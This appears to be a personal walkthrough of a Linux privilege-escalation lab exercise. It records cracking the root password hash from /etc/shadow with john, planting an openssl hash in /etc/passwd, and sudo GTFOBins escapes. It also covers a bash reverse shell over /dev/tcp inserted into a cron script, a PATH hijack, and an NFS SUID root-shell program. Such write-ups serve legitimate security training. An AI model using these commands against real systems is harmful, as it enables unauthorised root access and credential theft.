#Metadata

IP: 10.10.182.171
Date accessed: 07/07/2021


# Task 1

```ssh user@10.10.182.171

```
Ran the `id` command to answer the question

# Task 3
1) What is the root user's password hash? 

Answer: `etc /cat/shadow`
- Copy the hash between the colons `:` > answer

2) What hashing algorithm was ued to produce the root user's password hash? 
Answer: 

- `nano hash.txt`
- `john --wordlist=/usr/share/wordlist/rockyou.txt hash.txt`
- wait

```
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (?)
1g 0:00:00:00 DONE (2021-07-07 20:01) 2.127g/s 3268p/s 3268c/s 3268C/s kucing..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed


```
# Task 5

1) `openssl passwd critter`

```
root@debian:/home/user# openssl passwd critter
hYwHK598p3frk

```
2) `nano /etc/passwd`
3) replace the `x` with my hash 

```
root:hYwHK598p3frk:0:0:root:/root:/bin/bash


```

4) Run the `id command as the new root user`

```
	uid=0(root) gid=0(root) groups=0(root)

```

# Task 6 

1) How many programs is "user" allowed to run via sudo

```
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more


```
- Answer: 11

2) One program on the lsit does not have a shell escape sewuence on GTFOBIns, which is it? 

```
Apache2

```

# Task 9 Cron jobs

0) Set up a netcat listener on your machine `nc -lnvp 4444`
1) Edit the content of `backup.sh`, replace the IP with your machine

```
#!/bin/bash


bash -c 'exec bash -i &>/dev/tcp/10.9.2.138/4444 <&1'
```

2) Wait a minute for the shell to pop up

**Note** Took me a couple of tries to get the payload correct, the payload on the instructions did not work. 


# Task 10 Priviledge Escalation: PATH
1) find writeable file
```
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

```
`/home/murdoch` is an odd folder

2) Add the odd folder to PATH

```
export PATH=/home/murdoch:$PATH
$ echo $PATH
/home/murdoch:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

```


3) Add tmp
```
export PATH=/tmp:$PATH

```

4) Run a series of cmd to grab the flag

```
$ touch thm
$ echo "/bin/bash" >thm
$ chmod 777 thm
$ cd home/murdoch
$ ls
test  thm.py
$ ./test
root@ip-10-10-79-128://home/murdoch# 

```

# task 11:  Privilege Escalation: NFS 

1) `cat /etc/exports`

2) Enum moutable shares 
```

showmount -e 10.10.65.195
Export list for 10.10.65.195:
/home/ubuntu/sharedfolder *
/tmp                      *
/home/backup              *


```

2) mount our tmp folder to a shared file we can acccess, in this case is `home/ubuntu/sharedfolder`

**NOTE** make sure to test if you can cd into the mount first before mounting it. 

`root@kali-virtualbox:~# mount -o rw 10.10.187.186:/home/ubuntu/sharedfolder /tmp/backupmachine/
`

3) create nfs.c in /tmp/backupmachine

```

int main()
{ setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}


```


4) make the file executable
```
root@kali-virtualbox:/tmp/backupmachine# ls
root@kali-virtualbox:/tmp/backupmachine# nano nfs.c
root@kali-virtualbox:/tmp/backupmachine# gcc nfs.c -o nfs -w
root@kali-virtualbox:/tmp/backupmachine# chmod +s nfs
root@kali-virtualbox:/tmp/backupmachine# ls -l
total 24
-rwsr-sr-x 1 root root 16712 Feb 28 14:15 nfs
-rw-r--r-- 1 root root    74 Feb 28 14:14 nfs.c


```

5) navigate to the shares on the victim machine to run the executable

```
$ cd ubuntu/sharedfolder
$ ls
nfs  nfs.c
$ ./nfs
root@ip-10-10-187-186:/home/ubuntu/sharedfolder# id
uid=0(root) gid=0(root) groups=0(root),1001(karen)

```
